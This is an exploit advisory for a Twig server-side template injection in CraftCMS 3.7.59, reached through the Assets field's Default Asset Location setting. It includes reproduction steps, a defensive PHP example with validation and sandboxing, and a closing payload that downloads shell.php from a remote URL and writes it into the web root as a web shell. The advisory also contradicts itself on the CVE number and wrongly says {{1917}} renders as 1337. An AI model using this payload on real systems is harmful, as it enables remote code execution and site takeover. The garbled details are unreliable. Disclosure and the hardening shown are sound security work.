[CVE-2023-30178] Server-Side Template Injection

Exploit Author: Dat Nguyen aka datnlq of VietSunshine Cyber Security Services

Vendor of Product: CraftCMS

Affected Product Code Base: 3.7.59

CVE: CVE-2023-30179

Description: CraftCMS 3.7.59 is vulnerable to a Server-Side Template Injection (SSTI) vulnerability. An authenticated attacker can inject a Twig template into the Default Asset Location field when creating a new Field with the Assets field type, leading to Remote Code Execution.

Steps to reproduce:

  • Step 1: Go to Settings -> Fields and click New Field. Create a new Assets field and inject a Twig template into the Default Asset Location field, for example {{1917}}

  • Step 2: Create a new section. Then edit the section's Entry Types and, in the Field Layout, add the Assets field created in Step 1.

  • Step 3: Create a new Entry in the section created in Step 2 and upload a file to this entry.

  • Step 4: Double-click the uploaded file; the rendered result of the Twig template is shown in the Location field (the result of {{1917}} is 1337).
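The root cause the advisory describes is a configuration value (a storage location path) that an administrator enters as text but that the application then evaluates as a Twig template. The following is an added example, not CraftCMS code and not from the advisory author: it shows that pattern in plain Twig alongside two defensive variants, rejecting template delimiters where a literal path is expected, and, where dynamic paths are a deliberate feature, evaluating them only inside Twig's sandbox with a policy that allows no tags, functions or methods. The function names, the sample setting values and the assumption that the location string is fed straight to `createTemplate()` are all mine (requires twig/twig via Composer).

```php
<?php
// Added example (not CraftCMS code). Demonstrates the SSTI pattern behind the
// advisory and two hardened alternatives. Assumes twig/twig is installed.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Loader\ArrayLoader;
use Twig\Extension\SandboxExtension;
use Twig\Sandbox\SecurityPolicy;

// Constructed sample values: what an administrator might type into a
// "location" setting. The second one is template syntax where only a path
// belongs; it runs an arbitrary filter if the setting is evaluated as Twig.
const SETTING_BENIGN  = 'uploads/{{ entry.slug }}';
const SETTING_HOSTILE = '{{ ["hello"]|map("strtoupper")|join }}';

// VULNERABLE pattern: the untrusted setting becomes a template in a full
// Twig environment, so any filter/function Twig exposes is reachable.
function renderUnsafe(string $setting, array $context): string
{
    $twig = new Environment(new ArrayLoader());
    return $twig->createTemplate($setting)->render($context);
}

// HARDENED pattern 1: a storage path has no business containing Twig
// delimiters, so reject the value at validation time and store it as text.
function containsTwigSyntax(string $value): bool
{
    return (bool) preg_match('/\{\{|\{%|\{#/', $value);
}

// HARDENED pattern 2: when dynamic paths are an intended feature, render them
// only in a sandbox. The policy below allows no tags, no functions, no method
// or property access on objects, and a single harmless filter.
function renderSandboxed(string $setting, array $context): string
{
    $policy = new SecurityPolicy(
        [],          // allowed tags
        ['escape'],  // allowed filters
        [],          // allowed methods
        [],          // allowed properties
        []           // allowed functions
    );
    $twig = new Environment(new ArrayLoader());
    // second argument = true: every template is sandboxed, not only {% sandbox %} blocks
    $twig->addExtension(new SandboxExtension($policy, true));
    return $twig->createTemplate($setting)->render($context);
}

$context = ['entry' => ['slug' => 'report-2023']];   // constructed sample context

foreach ([SETTING_BENIGN, SETTING_HOSTILE] as $setting) {
    echo "setting: $setting\n";

    if (containsTwigSyntax($setting)) {
        echo "  validation: rejected, template syntax in a path field\n";
    }

    try {
        echo "  sandboxed: " . renderSandboxed($setting, $context) . "\n";
    } catch (\Twig\Sandbox\SecurityError $e) {
        // The hostile value hits the policy: "map" is not an allowed filter.
        echo "  sandboxed: blocked (" . get_class($e) . ")\n";
    }
}
```

Running this, the benign value is rejected by the delimiter check (a path field should not need templating at all) but renders fine in the sandbox, while the hostile value is both rejected by the check and stopped by the sandbox with a `SecurityNotAllowedFilterError` before any filter executes. The unsafe variant is kept only to make the contrast visible; the fix for the class of bug in this advisory is either of the two hardened forms, with validation preferred because it removes the template evaluation step entirely.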

Exploit and payload:

SSTI_UserPhotoLocation_RCE{% set source=['https://raw.githubusercontent.com/datnlq/CraftCMS/main/shell.php']|map('file_get_contents')|join %} {{{(source):"/var/www/html/craft_cms/web/shell.php"}|map("file_put_contents")|join()}}

The exploitation method is the same as for [CVE-2023-30179] Server-Side Template Injection.
